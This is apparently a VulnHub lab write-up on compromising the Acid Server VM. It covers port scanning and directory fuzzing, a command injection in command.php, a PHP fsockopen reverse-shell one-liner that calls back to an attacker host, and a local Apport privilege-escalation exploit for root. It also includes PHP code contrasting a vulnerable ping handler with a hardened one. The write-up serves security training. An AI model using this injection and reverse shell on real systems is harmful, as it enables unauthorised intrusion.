Acid Server


  • netdiscover
  • Nmap
  • Wfuzz
  • DirBuster
  • Burp


Apport (Ubuntu 14.04/14.10/15.04) - Race Condition Privilege Escalation

Use netdiscover to detect target IP address

netdiscover -i eth0 -r the target.

Then run nmap to detect open ports and running services on the target machine.

nmap -sV -v -O -A -T5 -p-

Port 33447 is open and running an HTTP service.

run wfuzz,

wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt --hc 404 2>/dev/null

Find a path: Challenge

use DirBuster, check

Check cake.php

check source code,

Find /Magic_Box, which may be a hidden path

use DirBuster again,

command.php looks interesting.

check that page:

type and use Burp

looks like it pings the IP address I typed

<img src="/images/blog/vulhub/acid_server/Selection_010.png" title="[title manually exploit [alt text]]" >

now try ;id

<img src="/images/blog/vulhub/acid_server/Selection_011.png" title="[title manually exploit [alt text]]" >

It works, so there is a command injection vulnerability.
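The injection above works because the typed value reaches a shell unvalidated. The following is an added example, not code from this post or from the Acid Server VM (the source of command.php is not shown here): it sets an assumed vulnerable pattern beside a hardened handler. All function names and sample inputs are hypothetical.

```php
<?php
declare(strict_types=1);

// Assumed vulnerable pattern: the form value is concatenated into a shell
// command line, so input such as "127.0.0.1;id" becomes two commands.
function ping_cmdline_vulnerable(string $ip): string
{
    return 'ping -c 1 ' . $ip; // string a handler would pass to shell_exec()
}

// Hardened: accept only a literal IPv4 address and return an argv array,
// or null when the input must be rejected.
function ping_argv(string $ip): ?array
{
    if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) === false) {
        return null;
    }
    return ['ping', '-c', '1', $ip];
}

// Array form of proc_open() (PHP 7.4+) executes the binary directly; no
// shell parses the arguments, so metacharacters have no special meaning.
function run_ping(array $argv): string
{
    $spec = [1 => ['pipe', 'w'], 2 => ['file', '/dev/null', 'w']];
    $proc = proc_open($argv, $spec, $pipes);
    if (!is_resource($proc)) {
        return '';
    }
    $out = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    proc_close($proc);
    return $out === false ? '' : $out;
}

// Constructed sample inputs; run_ping() is not called so this runs offline.
$samples = ['192.168.56.101', '127.0.0.1;id', '127.0.0.1 && id', '$(id)', ''];
foreach ($samples as $input) {
    $argv = ping_argv($input);
    printf("%-16s unsafe: %-26s safe: %s\n",
        var_export($input, true),
        var_export(ping_cmdline_vulnerable($input), true),
        $argv === null ? 'REJECTED' : json_encode($argv));
}
```

Only the first sample passes validation; every input containing a shell metacharacter is rejected before any process is started.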

In Burp, instead of the id command, use (URL-encoded):

php -r '$sock=fsockopen("",443);exec("/bin/sh -i <&3 >&3 2>&3");'

get the shell

<img src="/images/blog/vulhub/acid_server/Selection_012.png" title="[title manually exploit [alt text]]" >

python -c 'import pty; pty.spawn("/bin/bash")'

after some enumeration

cat /etc/*-release

<img src="/images/blog/vulhub/acid_server/Selection_013.png" title="[title manually exploit [alt text]]" >

Target is running Ubuntu 15.04

searchsploit ubuntu | grep 15.04

<img src="/images/blog/vulhub/acid_server/Selection_014.png" title="[title manually exploit [alt text]]" >

Since the target doesn’t have wget and gcc, I set up an FTP server, compiled the code locally and uploaded it.

get root

<img src="/images/blog/vulhub/acid_server/Selection_015.png" title="[title manually exploit [alt text]]" >